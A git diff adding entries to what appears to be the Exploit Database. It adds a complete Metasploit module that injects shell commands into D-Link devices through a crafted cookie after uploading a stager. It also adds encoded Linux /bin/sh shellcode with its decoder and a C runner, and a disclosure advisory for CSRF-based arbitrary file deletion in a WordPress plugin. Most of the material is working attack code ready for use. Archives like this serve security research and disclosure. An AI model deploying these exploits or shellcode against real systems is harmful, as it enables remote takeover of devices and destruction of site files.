diff --git a/files.csv b/files.csv index c66026290..e9d92dfe5 100755 --- a/files.csv +++ b/files.csv @@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 +37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0 37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0 @@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0 +37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0 +37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80 diff --git a/platforms/hardware/remote/37628.rb b/platforms/hardware/remote/37628.rb new file mode 100755 index 000000000..e428b305c --- /dev/null +++ b/platforms/hardware/remote/37628.rb @@ -0,0 +1,152 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link Cookie Command Execution', + 'Description' => %q{ + This module exploits an anonymous remote upload and code execution vulnerability on different + D-Link devices. The vulnerability is a command injection in the cookie handling process of the + lighttpd web server when handling specially crafted cookie values. This module has been + successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment. + }, + 'Author' => + [ + 'Peter Adkins ', # vulnerability discovery and initial PoC + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC + ], + 'DisclosureDate' => 'Jun 12 2015', + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE + } + ], + [ 'MIPS Big Endian', + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE + } + ] + ], + 'DefaultTarget' => 1 + )) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + + if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/ + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + print_status("#{peer} - Trying to access the device ...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") + end + + print_status("#{peer} - Uploading stager ...") + @counter = 1 + execute_cmdstager( + :flavor => :echo, + :linemax => 95 # limited by our upload, larger payloads crash the web server + ) + + print_status("#{peer} - creating payload and executing it ...") + + (1 .. @counter).each do |act_file| + # the http server blocks access to our files ... we copy it to a new one + # the length of our command is restricted to 19 characters + cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "chmod +x /tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "/tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "rm /tmp/#{act_file}" + execute_final_command(cmd) + cmd = "rm /tmp/#{act_file+@counter}" + execute_final_command(cmd) + end + end + + def execute_command(cmd,opts) + # upload our stager to a shell script + # upload takes quite long because there is no response from the web server + + file_upload = "#!/bin/sh\n" + file_upload << cmd << "\n" + + post_data = Rex::MIME::Message.new + post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"") + post_data.bound = "-#{rand_text_alpha(12)}--" + file = post_data.to_s + + @counter = @counter + 1 + + begin + send_request_cgi({ + 'method' => 'POST', + 'uri' => "/web_cgi.cgi", + 'vars_get' => { + '&request' =>'UploadFile', + 'path' => '/tmp/' + }, + 'encode_params' => false, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => file + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + + end + + def execute_final_command(cmd) + # very limited space - larger commands crash the webserver + fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18 + begin + send_request_cgi({ + 'method' => 'GET', + 'uri' => "/", + 'cookie' => "i=`#{cmd}`" + }, 5) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end +end \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/37495.py b/platforms/lin_x86/shellcode/37495.py new file mode 100755 index 000000000..f71c84d3e --- /dev/null +++ b/platforms/lin_x86/shellcode/37495.py @@ -0,0 +1,104 @@ +# Shellcode Title: ROT7 +# Date: 5 July 2015 +# Exploit Author: Artem Tsvetkov +# Software Link: +https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7 +# Tested on: Kali GNU/Linux 1.1.0 +# Platform: x86 Linux + +This code was created as an exercise for the SecurityTube Linux Assembly +Expert (SLAE). + +The following will produce rot7-encoded shellcode using a custom scheme to +dynamically set the shellcode length. The length is used by the decoder to +determine when it should stop decoding. + + + + +#!/usr/bin/python +# Python ROT-7 Encoder +# execve 24 bytes +shellcode = ( + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" + "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" +) + +# byte[0] == shellcode length +encoded = "\\x%02x," % len(bytearray(shellcode)) +encoded2 = "0x%02x," % len(bytearray(shellcode)) + +print 'Encoded shellcode ...' + +for x in bytearray(shellcode) : +# boundary is computed as 255-ROT(x) where x, the amount to rotate by + if x > 248: + encoded += '\\x' + encoded += '%02x' %(7 -(256 - x)) + encoded2 += '0x' + encoded2 += '%02x,' %(7 -(256 - x)) + else: + encoded += '\\x' + encoded += '%02x'%(x+7) + encoded2 += '0x' + encoded2 += '%02x,' %(x+7) + +print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2, +len(bytearray(shellcode))) + + + + +The following is the NASM decoder: + + +; ROT7 NASM decoder +global _start +section .text +_start: + jmp short stage + +decoder: + pop esi ; shellcode address + mov al, byte [esi] ; shellcode length + xor ecx, ecx ; position + +decode: + mov bl, byte [esi+ecx+1] ; get rot'ed byted + sub bl, 0x7 ; rot it back (-7) + mov byte [esi+ecx], bl ; store it in shellcode + inc ecx ; next position + cmp al, cl ; check if reached the end of shellcode + jnz short decode ; if not, continue derot'ing + jmp shellcode ; else, execute derot'ed shellcode + +stage: + call decoder + + ; Shellcode Format: + ; byte[0] = length of shellcode (max 0xff) + ; byte[1..] = rot'ed shellcode + shellcode: db +0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 + + + + +/* +* Sample run +* +* Compile with: gcc rot7.c -o rot7 +* +*/ +#include +#include + +unsigned char code[] = \ +"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} diff --git a/platforms/php/webapps/37629.txt b/platforms/php/webapps/37629.txt new file mode 100755 index 000000000..28cb33abe --- /dev/null +++ b/platforms/php/webapps/37629.txt @@ -0,0 +1,62 @@ +Details +================ +Software: BuddyPress Activity Plus +Version: 1.5 +Homepage: http://wordpress.org/plugins/buddypress-activity-plus/ +Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/ +CVE: Awaiting assignment +CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C) + +Description +================ +CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5 + +Vulnerability +================ +An attacker can delete any file the PHP process can delete. +For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing. + +Proof of concept +================ +Ensure your PHP user can do maximum damage: +sudo chown www-data:www-data /var/vhosts/my-wordpress-site +Visit a page containing this as a logged-in user and click submit: +
+ + + +
+If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory. +Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files. +There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”. + +Mitigations +================ +Upgrade to version 1.6.2 or later +If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php. + +Disclosure policy +================ +dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ + +Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. + +This vulnerability will be published if we do not receive a response to this report with 14 days. + +Timeline +================ + +2013-08-22: Discovered +2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/ +2015-07-13: Requested CVE +2015-07-13: Vendor responded +2015-07-14: Vendor reported issue fixed +2015-07-14: Published + + + +Discovered by dxw: +================ +Tom Adams +Please visit security.dxw.com for more information. + \ No newline at end of file